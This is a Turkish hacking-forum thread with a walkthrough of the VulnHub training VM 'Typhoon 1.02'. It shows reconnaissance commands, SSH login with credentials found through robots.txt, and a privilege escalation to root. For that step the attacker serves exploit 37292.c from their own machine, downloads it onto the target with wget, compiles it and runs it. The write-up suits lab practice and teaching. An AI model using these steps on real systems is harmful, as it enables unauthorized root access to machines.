THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Typhoon: 1.02 Zafiyetli Makine Çözümü

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
07-12-2018 14:26
#1
Typhoon: 1.02 Zafiyetli Makine Çözümü
Typhoon: 1.02 Zafiyetli Makine Çözümü

Typhoon: 1.02 indirme linki;

Kod:
https://www.vulnhub.com/entry/typhoon-102,267/
Makinemizin ilk açılış görüntüsü.





İlk olarak makinemizin IP adresini öğreniyoruz.

Kod:
netdiscover




Ardından nmap taraması ile açık portlara bakıyoruz.

Kod:
nmap -sS -sV <adress>




Sitemize bir bakıyoruz.Bizi bu şekilde bir site karşılıyor.



Ardından dirb taraması yapıp site içerisindeki dosyalara bakıyoruz.

Kod:
dirb http://<adress>




Sitemizde robots.txt adlı bir uzantı var çoğunlukla burada çözümde ilerlemeye dayalı bilgiler barındırılıyor hemen robots.txt'yi açıyoruz.



robots.txt'yi açtığımızda bize başka bir uzantıya gitmemiz gerektiğini söylüyor.



[stats] a bastığımız zaman aşağıya bir takım giriş bilgilerinin geldiğini görmekteyiz.



Bu giriş bilgileri doğrultusunda giriş yapmayı deniyoruz.

Kod:
ssh typhoon@<adress>
Kod:
789456123


Şimdi kendimizi root'a yükseltmemiz gerekiyor.Bunun için ilk olarak ubuntunun exploitlerine bakıyoruz.Ardından 7575 portu üzerinden python kodu ile giriş sağlayacağız.7575 portumuzu dinlemeye alıyoruz.


Kod:
searchsploit ubuntu 14.04
Kod:
searchsploit -m 37292
python -m SimpleHTTPServer 7575


Şimdi dinlemeye aldığımız 7575 portumuza makinemizden 37292.c dosyasını indirmesini sağlıyoruz.Ardından 37292.c dosyasını derlemesini sağlıyoruz.Derledikten sonra da dosyamızı açıyoruz.


Kod:
cd /tmp
Kod:
wget http://<uradress>:7575/37292.c
gcc 37292.c -o exploit
./exploit


Açıktan yararlanarak sistemde root kullanıcısı olduk şimdi tek yapmamız gereken flag.txt'yi aramak olacak.

Kod:
cd /root
Kod:
cat root-flag








---------------------
A hacker does for love what others would not do for money.
Konu Qwx tarafından (07-12-2018 14:27 Saat 14:27 ) değiştirilmiştir. Sebep: flag.jpg'yi ortaladım.
oxcakmak, gulsah44 Teşekkür etti.
oxcakmak - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
Kocaeli
Yaş:
20
Mesajlar:
1.394
Konular:
80
Teşekkür (Etti):
474
Teşekkür (Aldı):
143
Ticaret:
(0) %
07-12-2018 14:28
#2
Ellerine sağlık bu local hack için mi?
---------------------
PHP / PDO - Back-End Developer - Full Open Source
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
07-12-2018 14:36
#3
Alıntı:
oxcakmak´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık bu local hack için mi?

Teşekkür ederim.Evet local hack için.
---------------------
A hacker does for love what others would not do for money.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler